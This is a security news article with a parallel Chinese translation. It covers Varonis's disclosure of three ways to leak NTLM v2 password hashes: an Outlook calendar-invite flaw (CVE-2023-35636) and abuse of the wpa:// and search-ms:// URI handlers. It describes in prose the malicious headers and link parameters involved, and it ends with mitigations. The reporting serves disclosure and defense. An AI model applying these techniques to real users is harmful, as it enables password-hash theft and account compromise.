Accepting a calendar invite in Outlook could leak your password

A Microsoft Outlook vulnerability that leaks hashed passwords through malicious calendar invites is one of three Microsoft password-stealing exploits detailed by security researchers on Thursday.
Microsoft Outlook漏洞通过恶意日历邀请泄露哈希密码，这是安全研究人员周四详述的三个Microsoft密码窃取漏洞之一。

The Outlook and Windows application exploits can be achieved in just one or two clicks, according to researchers from Varonis, which first reported the issues to Microsoft in July 2023.
根据 Varonis 的研究人员的说法，Outlook 和 Windows 应用程序漏洞只需单击一两次即可实现，他们于 2023 年 7 月首次向 Microsoft 报告了这些问题。

The Outlook vulnerability, tracked as CVE-2023-35636, received a patch on Dec. 12. The other two reported issues, involving Windows Performance Analyzer (WPA) and Windows File Explorer (WFE), were closed by Microsoft due to “moderate severity,” Varonis researchers said.
跟踪为 CVE-2023-35636 的 Outlook 漏洞于 12 月 12 日收到补丁。Varonis研究人员表示，另外两个报告的问题，涉及Windows Performance Analyzer（WPA）和Windows文件资源管理器（WFE），由于“中等严重性”，Microsoft关闭了这些问题。

“These were not patched; according to Microsoft, this behavior was not considered a vulnerability. However, we see it as a basic legitimate attack vector,” Dvir Sason, security research manager at Varonis, told SC Media.
“这些没有打补丁;根据Microsoft的说法，这种行为不被视为漏洞。然而，我们认为它是一种基本的合法攻击媒介，“Varonis的安全研究经理Dvir Sason告诉SC Media。

The Varonis team disclosed the technical details about the exploits for the first time on Thursday, intentionally leaving time for users to apply the relevant December patch.
Varonis 团队在周四首次披露了有关漏洞利用的技术细节，有意为用户留出时间应用相关的 12 月补丁。

1-click Outlook vulnerability leaks passwords through calendar function
一键式Outlook漏洞通过日历功能泄露密码

Accepting a calendar invite on Outlook sometimes involves opening an iCalendar (.ics) file, a format that enables events and other calendar data to be shared and added to one’s own calendar application.
在 Outlook 上接受日历邀请有时涉及打开 iCalendar （.ics） 文件，这是一种允许共享事件和其他日历数据并将其添加到自己的日历应用程序中的格式。

For example, an Outlook user can accept a calendar invitation from a Google Calendar user, and Outlook will retrieve event details from the .ics to add to its own calendar application.
例如，Outlook 用户可以接受来自 Google 日历用户的日历邀请，Outlook 将从 .ics 中检索事件详细信息，以添加到自己的日历应用程序中。

CVE-2023-35636 allows NTLM v2 hashed passwords to be leaked in this calendar-sharing process with the use of malicious email headers that prompt Outlook to send a request to the attacker’s system.
CVE-2023-35636 允许在此日历共享过程中泄露 NTLM v2 哈希密码，并使用恶意电子邮件标头提示 Outlook 向攻击者的系统发送请求。

First, the attacker needs to include a header that indicates the “content-class” is “sharing,” and secondly, the attacker needs to include an “x-sharing-config-url” header that directs to an .ics file path on the attacker’s own machine.
首先，攻击者需要包含一个标头，指示“内容类”是“共享”，其次，攻击者需要包含一个“x-sharing-config-url”标头，该标头指向攻击者自己计算机上的 .ics 文件路径。

If an Outlook user clicks the calendar invite link (with a prompt such as “Open this iCal”), the hashed password is exposed when Outlook attempts to authenticate on the attacker’s machine to retrieve the .ics file.
如果 Outlook 用户单击日历邀请链接（带有“打开此 iCal”等提示），则当 Outlook 尝试在攻击者的计算机上进行身份验证以检索 .ics 文件时，将公开哈希密码。

Hackers can use widely available tools, such as legitimate open-source penetration testing tools, to view the packet containing the victim’s authentication attempt, including the hashed password.
黑客可以使用广泛可用的工具（例如合法的开源渗透测试工具）来查看包含受害者身份验证尝试的数据包，包括哈希密码。

Offline brute-force attacks, in which many passwords are automatically generated and tested against the hash, or authentication relay attacks, in which the victim’s authentication request is forwarded back to the server the attacker is attempting to infiltrate, could be used to leverage the leaked NTLM hash.
脱机暴力攻击（其中自动生成许多密码并针对哈希进行测试）或身份验证中继攻击（其中受害者的身份验证请求被转发回攻击者试图渗透的服务器）可用于利用泄露的 NTLM 哈希。

After opening the malicious email, the victim only needs to make one click (accepting the calendar invite) for their password to be leaked, setting CVE-2023-35636 apart from the other two issues reported by Varonis.
打开恶意邮件后，受害者只需点击一下（接受日历邀请）即可泄露密码，将 CVE-2023-35636 与 Varonis 报告的其他两个问题区分开来。

“We believe one-click weaponization is the difference between a vulnerability that should be patched versus an abuse of functionality that is not considered a vulnerability,” Sason told SC Media, regarding Microsoft’s decision to assign a CVE to this exploit.
“我们认为一键武器化是应该修补的漏洞与滥用不被视为漏洞的功能之间的区别，”Sason告诉SC Media，关于Microsoft决定将CVE分配给此漏洞。

A patch for CVE-2023-35636 was included in Microsoft Office and Microsoft 365 updates on Dec. 12. The vulnerability was given a medium-severity CVSS score of 6.5.
CVE-2023-35636 补丁已于 12 月 12 日包含在 Microsoft Office 和 Microsoft 365 更新中。该漏洞的 CVSS 评分为 6.5 分。

While the exact remediation rate for vulnerabilities like CVE-2023-35636 is not known, a 2023 report by Edgescan found that the mean time to remediation for vulnerabilities of critical severity was 65 days.
虽然 CVE-2023-35636 等漏洞的确切修复率尚不清楚，但 Edgescan 2023 年的一份报告发现，严重性漏洞的平均修复时间为 65 天。

2 other Windows exploits abuse developer tools, file search
2 其他 Windows 漏洞滥用开发人员工具，文件搜索

The researchers demonstrated two other methods of stealing hashed passwords using Windows applications, which require more user interaction and were not considered to be vulnerabilities in the applications by Microsoft.
研究人员展示了使用Windows应用程序窃取哈希密码的另外两种方法，这些方法需要更多的用户交互，并且不被Microsoft视为应用程序中的漏洞。

In one case, an attacker could use an https:// web link to redirect to a link with a wpa:// URI handler, which is opened in the software development application Windows Performance Analyzer.
在一种情况下，攻击者可以使用 https:// Web 链接重定向到具有 wpa:// URI 处理程序的链接，该处理程序在软件开发应用程序 Windows 性能分析器中打开。

The researchers found that if the wpa:// link directs to a file contained at the attackers IP, an authentication request is sent over the internet to the attacker’s system that leaks the victim’s hashed password.
研究人员发现，如果 wpa:// 链接指向攻击者 IP 中包含的文件，则会通过互联网向攻击者的系统发送身份验证请求，从而泄露受害者的哈希密码。

This attack would require the victim to both click the initial malicious web link and subsequently open WPA when prompted by their browser.
这种攻击将要求受害者单击最初的恶意 Web 链接，然后在浏览器提示时打开 WPA。

Another similar exploit involves manipulating a victim to click a link that uses search-ms:// — the URI handler for the search function of Explorer.exe in Windows File Manager.
另一个类似的漏洞涉及操纵受害者单击使用 search-ms：// 的链接——Windows 文件管理器中 Explorer.exe 搜索功能的 URI 处理程序。

The attacker would need to craft a search-ms:// link that includes a fake search query and uses either the subquery or crumb advanced search parameters to direct the search over the internet to a location on the attacker’s machine. The victim’s hashed password is leaked when Explorer.exe attempts to access this location.
攻击者需要构建一个包含虚假搜索查询的 search-ms：// 链接，并使用 subquery 或 crumb 高级搜索参数通过 Internet 将搜索定向到攻击者计算机上的某个位置。当 Explorer.exe 尝试访问此位置时，受害者的哈希密码会泄露。

This method also requires two clicks, first on the initial phishing link and then on the in-browser prompt to open Windows Explorer.
此方法还需要单击两次，首先单击初始网络钓鱼链接，然后在浏览器内提示符上打开 Windows 资源管理器。

The researchers note that this exploit has similar indicators of compromise to CVE-2023-23397, a “zero touch” elevation of privilege vulnerability in Microsoft Outlook that was exploited by the Fancy Bear threat group last year.
研究人员指出，此漏洞具有与CVE-2023-23397类似的妥协指标，CVE-2023-23397是Microsoft Outlook中的“零接触”特权提升漏洞，去年被Fancy Bear威胁组织利用。

“I personally believe these vulnerabilities should be considered medium threats, and organizations should monitor for specific and niche communication protocols egressing towards internal and external addresses – as we demonstrated in our research,” said Sason.
“我个人认为这些漏洞应该被视为中等威胁，组织应该监控流向内部和外部地址的特定和利基通信协议——正如我们在研究中证明的那样，”Sason说。

Protecting against NTLM hash attacks
防范 NTLM 哈希攻击

As mentioned, passwords hashed by NTLM v2 can still be used by attackers to gain access to victims’ systems via offline brute forcing and authentication relay.
如前所述，攻击者仍然可以使用 NTLM v2 散列的密码通过脱机暴力破解和身份验证中继访问受害者的系统。

Therefore, Varonis recommends forcing Kerberos authentication in place of NTLM whenever possible. Kerberos’ use of time-limited, session-specific tickets for authentication protects against brute force and authentication relay tactics.
因此，Varonis 建议尽可能强制使用 Kerberos 身份验证来代替 NTLM。Kerberos 使用有时间限制的、特定于会话的票证进行身份验证，可防止暴力破解和身份验证中继策略。

Blocking outgoing NTLM v2 is also a method that can prevent these exploits; although this option was made available in an insider preview build of Windows 11, it is unclear when or if this will become available for general users, Sason noted.
阻止传出 NTLM v2 也是一种可以防止这些漏洞的方法;Sason 指出，尽管此选项在 Windows 11 的 Insider Preview 版本中可用，但目前尚不清楚何时或是否会对普通用户可用。

As always, organizations should stay up to date with all software patches and stay abreast of diverse phishing tactics, such as the calendar invite exploit.
与往常一样，组织应及时了解所有软件补丁，并及时了解各种网络钓鱼策略，例如日历邀请漏洞。

原文始发于Laura French：Accepting a calendar invite in Outlook could leak your password